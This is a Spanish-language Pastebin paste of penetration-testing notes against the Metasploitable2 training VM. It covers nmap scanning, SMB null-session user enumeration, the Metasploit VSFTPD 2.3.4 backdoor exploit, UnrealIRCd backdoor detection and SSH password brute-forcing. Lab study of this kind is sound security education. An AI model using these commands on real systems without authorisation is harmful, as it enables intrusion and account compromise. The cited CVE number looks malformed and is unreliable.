Advertisement
Guest User

Untitled

a guest
Aug 19th, 2018
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.99 KB | None | 0 0
  1. Lo primero que tenemos que hacer es analizar al objetivo con nmap.
  2. Recomendado utilizar los prefijos:
  3.  
  4. -sS (Escaneo sigiloso sin SYN al final del handshake)
  5. -sV (Para ver la version de los servicios abiertos)
  6. -O (Para saber el sistema operativo)
  7.  
  8. nmap -sS -sV -O <IP>
  9.  
  10. ------------------------------------------------------------------------------
  11.  
  12. Lo siguiente es enumerar los usuarios dentro del sistema, esto se puede
  13. realizar con el comando:
  14.  
  15. nmap -script smb-enum-users.nse -p 445 <IP>
  16.  
  17. Este comando utilizar un script (-script) llamado "smb-enum-users.nse"
  18. con el parametro -p (Puerto especifico) y el puerto 445 (microsoft-database)
  19.  
  20. ------------------------------------------------------------------------------
  21.  
  22. Enumeración de cuentas de usuario a través de sesiones nulas con rpcclient
  23.  
  24. Rpcclient es una herramienta de Linux utilizada para ejecutar funciones
  25. MS-RPC del lado del cliente. Una sesión nula es una conexión con un servidor
  26. samba o SMB que no requiere autenticación con una contraseña.
  27. No se necesita nombre de usuario o contraseña para configurar la conexión y,
  28. por lo tanto, se denomina sesión nula.
  29.  
  30. Usamos el comando:
  31.  
  32. rpcclient -U "" <IP>
  33.  
  34. El prefijo -U (Define un nombre de usuario)
  35. Luego utilizaremos el comando "querydominfo" para obtener informacion del
  36. sistema como la cantidad de usuarios o WORKGROUP.
  37.  
  38. Luego usaremos "enumdomusers" para enumerar los usuarios juntos a su rID
  39. y con queryuser <usuario> obtendremos informacion especifica sin administrador
  40.  
  41. ------------------------------------------------------------------------------
  42.  
  43. Enumeración con enum4linux
  44.  
  45. Enum4linux se usa para enumerar hosts de Windows y Samba y está escrito en
  46. Perl. La herramienta es básicamente un contenedor para smbclient, rpcclient,
  47. net y nmblookup.
  48.  
  49. Uso: ./enum4linux.pl [opciones] ip
  50.  
  51. -U obtener userlist
  52. -M obtener lista de máquinas *
  53. -S obtener sharelist
  54. -P obtener información de la política de contraseñas
  55. -G obtener lista de miembros y grupos
  56. -u usuario especifica el nombre de usuario a usar (por defecto "")
  57. -p pase especificar contraseña para usar (valor predeterminado ""
  58. -a Haga toda la enumeración simple (-U -S -G -P -r -o -n -i).
  59. -o Obtener información del sistema operativo
  60. -i Obtener información de la impresora
  61.  
  62. Nos brindara mucha informacion sobre el sistema operativo, los usuarios,
  63. los puertos y los servicios, con sus respectivas versiones.
  64.  
  65. ------------------------------------------------------------------------------
  66.  
  67. **Antes de continuar con la siguiente Fase es necesario tener la siguiente
  68. informacion del sistema objetivo.**
  69.  
  70. - Sistema operativo y su version
  71. - Nombre del servidor
  72. - Numero de cuentas de usuario
  73. - Nombre de la cuenta del administrador
  74. - Fecha de caducidad de la clave de admin (Solo si hay)
  75. - Puertos abiertos, servicios y version
  76. - Servidores Web y base de datos ejecutandose (ej: sql, apache)
  77.  
  78. ------------------------------------------------------------------------------
  79.  
  80. Vulnerabilidades de VSFTPD v2.3.4 (Servicio ftp en metasploitable2)
  81.  
  82. Cuando buscamos en Google vulnerabilidades conocidas para este servicio,
  83. aparece una puerta trasera conocida que se introdujo en una descarga del
  84. software en la versión 2.3.4:
  85.  
  86. A los pocos dias fue eliminado, asi que la mitad de las versiones 2.3.4
  87. incluyen esta backdoor.
  88.  
  89. Nombre tecnico:
  90. CVE: CVE-2011-02523
  91. OSVDB: 73573
  92.  
  93. Podriamos simplemente lanzar el exploit y adivinar si es vulnerable o no
  94. o tambien podemos utilizar nmap para analizar y saber previamente si existe
  95. la posibilidad de una backdoor en el sistema de VSFTPD
  96.  
  97. nmap -script ftp-vsftpd-backdoor -p 21 <IP>
  98.  
  99. En el caso de metasploitable2 el sistema es vulnerable, solo nos queda usar
  100. metasploit y cargar el CVE-2011-02523, cargar el puerto y la IP y lanzar
  101. el exploit contra la maquina.
  102.  
  103. use exploit/unix/ftp/vsftpd_234_backdoor
  104. show options
  105. exploit
  106. ------------------------------------------------------------------------------
  107.  
  108. Vulnerabilidades de ircd unreal
  109.  
  110. Un método común para determinar la versión de un servicio es mediante el uso
  111. de una técnica de captura de pancartas. Netcat es una herramienta que se
  112. puede usar para este propósito.
  113.  
  114. nc <IP> <Puerto>
  115.  
  116. En caso de que no obtener nada, simplemente utilizar
  117.  
  118. nmap -A -p <puerto> <IP>
  119.  
  120. Al buscar la version encontramos que tiene una puerta trasera. Utilizamos
  121. nmap para verificar.
  122.  
  123. nmap -sV script irc-unrealircd-backdoor -p <Puerto> <IP>
  124.  
  125. _____________________________________________________________________
  126. |PORT | STATE| SERVICE| VERSION |
  127. |________|______|________|____________________________________________|
  128. |6667/tcp| open | irc | UnrealIRCd |
  129. |________|______|________|____________________________________________|
  130. |irc-unrealircd-backdoor: Looks like trojaned version of unrealircd |
  131. |_____________________________________________________________________|
  132. |Service Info: Host: irc.Metasploitable.LAN |
  133. |_____________________________________________________________________|
  134.  
  135.  
  136. ------------------------------------------------------------------------------
  137.  
  138. Ataque SSH
  139.  
  140. 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  141. | ssh-hostkey:
  142. | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
  143. |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
  144.  
  145. ESTO ES lo que nos brinda nmap tras el analisis al puesto 22. Evidentemente
  146. este es el flag que nos indica la forma en la que debemos atacar.
  147.  
  148. ssh_login es el objetivo
  149.  
  150. Module name is auxiliary/scanner/ssh/ssh_login
  151. Module name is auxiliary/scanner/ssh/ssh_login_pubkey
  152.  
  153. Con ssh_login podremos realizar un ataque de fuerza bruta para probar
  154. diferentes contrasenas.
  155.  
  156. Colocamos el RHOSTS
  157. Colocamos el diccionario de fuerza bruta (predeterminado de metasploit)
  158.  
  159. set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
  160.  
  161. Ejecutamos el ataque.
  162.  
  163. Private Key ssh_login_pubkey
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement